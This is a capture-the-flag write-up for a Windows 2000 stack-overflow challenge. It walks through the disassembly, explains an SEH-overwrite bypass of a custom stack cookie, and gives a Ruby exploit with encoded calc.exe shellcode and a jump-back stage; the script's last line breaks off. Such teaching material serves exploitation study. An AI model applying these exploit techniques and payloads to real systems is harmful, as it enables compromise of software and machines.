Advanced Windows Buffer Overflows: Take #2

This time around we will take a look at the second challenge taken from VRT's AWBO challenges. Let's go straight for it by looking at the disassembly dump:
.text:00401000                 push    ebp
.text:00401001                 mov     ebp, esp
.text:00401003                 sub     esp, 1036
.text:00401009                 push    ebx
.text:0040100A                 push    esi
.text:0040100B                 push    edi
.text:0040100C                 mov     eax, endSequence
.text:00401011                 mov     [ebp+Buf1], eax ; Buf1 = "\x00\x0a\x0d\x20"
.text:00401014                 mov     cl, byte_406034
.text:0040101A                 mov     [ebp+var_4], cl
.text:0040101D                 int     3               ; Trap to Debugger
.text:0040101E                 lea     edx, [ebp+Buffer]
.text:00401024                 mov     [ebp+var_C], edx
.text:00401027                 lea     eax, [ebp+Buffer]
.text:0040102D                 push    eax             ; Buffer
.text:0040102E                 call    _gets
.text:00401033                 add     esp, 4
.text:00401036                 mov     ecx, [ebp+var_C]
.text:00401039                 push    ecx
.text:0040103A                 push    offset Format   ; "You sent me: %s"
.text:0040103F                 call    _printf
.text:00401044                 add     esp, 8
.text:00401047                 push    4               ; Size
.text:00401049                 push    offset nil_r_n_space ; Buf2
.text:0040104E                 lea     edx, [ebp+Buf1]
.text:00401051                 push    edx             ; Buf1
.text:00401052                 call    _memcmp
.text:00401057                 add     esp, 0Ch
.text:0040105A                 test    eax, eax
.text:0040105C                 jz      short loc_40107C
.text:0040105E                 push    offset aFail_   ; "Fail.\n"
.text:00401063                 call    _printf
.text:00401068                 add     esp, 4
.text:0040106B                 push    4               ; Size
.text:0040106D                 push    offset aAaaa    ; "AAAA"
.text:00401072                 push    0               ; Dst
.text:00401074                 call    _memcpy
.text:00401079                 add     esp, 0Ch
.text:0040107C
.text:0040107C loc_40107C:                             ; CODE XREF: _main+5Cj
.text:0040107C                 xor     eax, eax
.text:0040107E                 pop     edi
.text:0040107F                 pop     esi
.text:00401080                 pop     ebx
.text:00401081                 mov     esp, ebp
.text:00401083                 pop     ebp
.text:00401084                 retn
.text:00401084 _main           endp

In essence, what we have here is a simple program that uses C's gets() function to receive input from the user. The obvious attack vector is to overwrite some information on the stack. Unfortunately, this function places a custom cookie on the stack, made of the 4 bytes 0x00, 0x0a, 0x0d and 0x20 (the Buf1 value annotated in the listing). We can't overwrite the return address in the traditional sense, because right before returning the function checks that the cookie still contains this very value, and gets() stops reading at a newline, so our input cannot put the 0x0a byte back in place. If the check fails, the program attempts an impossible memcpy to address 0x00000000, which raises an exception.

Speaking of impossible paths and exceptions, the only choice we have is to go after the exception handler. Since the system we're playing with is Windows 2000, we have a very easy platform on which to abuse the Structured Exception Handler (SEH from now on). Like we did last time, we will use Metasploit's pattern generating tools to analyze the stack and see where the SEH structure is located. This shows that the EXCEPTION_REGISTRATION structure sits 1084 bytes after the beginning of our input.

Let's remind ourselves what this stack structure looks like. It contains two members: the first is a pointer to the next EXCEPTION_REGISTRATION structure (remember that exception handlers are chained across stack frames) and the second is the exception handler itself. On Windows 2000, at the moment the handler is invoked, the ebx register points to the current frame's EXCEPTION_REGISTRATION structure. We will use this to our advantage and overwrite the handler with the address of a 'jmp ebx' instruction, redirecting execution to the beginning of the EXCEPTION_REGISTRATION structure. Since we're going to abuse the exception handling right away in our own stack frame, we don't need to care about the pointer to the next EXCEPTION_REGISTRATION structure.
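As a reminder of the two-member layout described above, here is a minimal Ruby sketch of a 32-bit EXCEPTION_REGISTRATION record as it would appear inside the overflowing input. The helper name exception_registration and the handler address 0x41414141 are placeholders made up for illustration; the real handler value has to be the address of a 'jmp ebx' instruction found on the target system.

```ruby
# Sketch only: builds the 8 bytes that overwrite an EXCEPTION_REGISTRATION
# record on 32-bit Windows. Both fields are 4 bytes wide.
#   offset 0: pointer to the next EXCEPTION_REGISTRATION in the chain
#   offset 4: pointer to the exception handler (little-endian DWORD)
def exception_registration(next_field, handler_addr)
  raise ArgumentError, "next field must be 4 bytes" unless next_field.bytesize == 4
  next_field.b + [handler_addr].pack("V")
end

# The next pointer is never followed in this attack, so its 4 bytes are free
# to hold code. This is the short jump used by the exploit in this post.
jump = "\xCC\xEB\x10\xCC".b

# PLACEHOLDER address (hypothetical): replace with a real 'jmp ebx' address.
JMP_EBX_PLACEHOLDER = 0x41414141

record = exception_registration(jump, JMP_EBX_PLACEHOLDER)
puts record.unpack("H*").first   # hex dump of the 8-byte record
```

The first four bytes are raw code rather than a valid pointer, which is fine here because nothing walks the handler chain past this record.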
Because the next pointer is of no use to us, we will place a small piece of code at the beginning of the structure, so that once execution lands there after the 'jmp ebx' instruction, we jump over the bytes holding the address of 'jmp ebx' and reach our first stage shellcode. From that point on we have full control of the execution and can place whatever code we want after our 'tweaked' EXCEPTION_REGISTRATION structure. Unfortunately, there's very little stack space left because this is a one-stack-frame program. What we will do instead is place a few instructions there that send us back to the beginning of our input, where we have more than a thousand free bytes, which should be enough for a PoC shellcode. All this considered, this is the layout of our exploit input:

| NOP sled | Shellcode | jump-over-struct | ret_addr | stage1

Since ebx points to the EXCEPTION_REGISTRATION structure and our input sits right before it, we will decrement ebx repeatedly until it points into our input. Each decrement must use an operand no larger than 0x7F; otherwise the instruction would need a full 4-byte operand, which would add null bytes to our shellcode, and we don't want that. This is the exploit code in Ruby:
#!/usr/bin/env ruby

# windows/exec - 304 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# EXITFUNC=process, CMD=calc.exe
shellcode = "\x89\xe0\xdd\xc5\xd9\x70\xf4\x5e\x56\x59\x49\x49\x49\x49" +
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" +
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" +
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" +
"\x42\x75\x4a\x49\x4b\x4c\x4b\x58\x50\x44\x45\x50\x43\x30" +
"\x45\x50\x4c\x4b\x51\x55\x47\x4c\x4c\x4b\x43\x4c\x45\x55" +
"\x42\x58\x45\x51\x4a\x4f\x4c\x4b\x50\x4f\x44\x58\x4c\x4b" +
"\x51\x4f\x51\x30\x43\x31\x4a\x4b\x47\x39\x4c\x4b\x47\x44" +
"\x4c\x4b\x43\x31\x4a\x4e\x46\x51\x49\x50\x4d\x49\x4e\x4c" +
"\x4b\x34\x49\x50\x44\x34\x43\x37\x49\x51\x48\x4a\x44\x4d" +
"\x45\x51\x49\x52\x4a\x4b\x4b\x44\x47\x4b\x46\x34\x51\x34" +
"\x43\x34\x44\x35\x4d\x35\x4c\x4b\x51\x4f\x46\x44\x43\x31" +
"\x4a\x4b\x43\x56\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x4f" +
"\x45\x4c\x43\x31\x4a\x4b\x4c\x4b\x45\x4c\x4c\x4b\x43\x31" +
"\x4a\x4b\x4d\x59\x51\x4c\x51\x34\x45\x54\x48\x43\x51\x4f" +
"\x46\x51\x4c\x36\x43\x50\x46\x36\x43\x54\x4c\x4b\x47\x36" +
"\x50\x30\x4c\x4b\x47\x30\x44\x4c\x4c\x4b\x42\x50\x45\x4c" +
"\x4e\x4d\x4c\x4b\x43\x58\x45\x58\x4d\x59\x4a\x58\x4b\x33" +
"\x49\x50\x42\x4a\x46\x30\x42\x48\x43\x4e\x49\x48\x4b\x52" +
"\x42\x53\x42\x48\x4c\x58\x4b\x4e\x4c\x4a\x44\x4e\x50\x57" +
"\x4b\x4f\x4b\x57\x43\x53\x43\x51\x42\x4c\x42\x43\x46\x4e" +
"\x42\x45\x42\x58\x45\x35\x43\x30\x41\x41"

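# overwrites the 'next' pointer: int3; jmp short +0x10; int3
# the short jump hops over the overwritten Handler field
jump = "\xCC\xEB\x10\xCC"

# 8 x 'sub ebx, 0x7F' (1016 bytes back) so ebx points into our input,
# then 'jmp ebx' (FF E3) to jump to it
stage1 = "\x83\xEB\x7F"*8+"\xFF\xE3"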

# put it all together and print it
puts ("\x90"*(1084-shellcode.length))<
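To make the operand-size argument concrete, the sketch below compares the two x86 encodings of 'sub ebx, imm' and works out how far stage1 moves ebx. The opcodes (83 EB ib for a sign-extended 8-bit immediate, 81 EB id for a 32-bit one) are the standard x86 forms; the helper name sub_ebx is made up for this example and only handles non-negative amounts.

```ruby
# Sketch: encode 'sub ebx, imm' the way an assembler would choose the form.
def sub_ebx(imm)
  if imm.between?(0, 0x7F)
    "\x83\xEB".b + [imm].pack("C")   # 83 EB ib : 8-bit immediate, sign-extended
  else
    "\x81\xEB".b + [imm].pack("V")   # 81 EB id : 32-bit little-endian immediate
  end
end

short_form = sub_ebx(0x7F)   # 3 bytes, no null bytes
long_form  = sub_ebx(0x80)   # 6 bytes, immediate is 80 00 00 00

puts short_form.unpack("H*").first
puts long_form.unpack("H*").first
puts "long form contains null bytes: #{long_form.include?("\x00".b)}"

# stage1 as used in the exploit: eight decrements, then 'jmp ebx' (FF E3)
stage1 = sub_ebx(0x7F) * 8 + "\xFF\xE3".b
puts "ebx moves back #{8 * 0x7F} bytes; stage1 is #{stage1.bytesize} bytes long"
```

Eight decrements of 0x7F move ebx back 1016 bytes, which lands inside the 1084 bytes of input that precede the EXCEPTION_REGISTRATION structure.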
The shellcode uses WinExec() to execute calc.exe. Since this is quite a small program that runs very fast, and WinExec() is an asynchronous call, the API doesn't have enough time to actually finish executing the call. Hence it only works in a debugger, stepping through it to give the API call enough time. The basic workaround is to include a call to Sleep() in the shellcode, but since these shellcodes are quite optimized, it's quite a pain in the ass to edit or tweak them. My basic objective for this challenge was to make it run arbitrary code, and that's clearly done. Also, I've recently got a copy of the flamboyant new edition of Windows Internals and I'm quite eager to dive into it.

Credits go to Ruben Santamarta for pointing out the WinExec issue. See you around!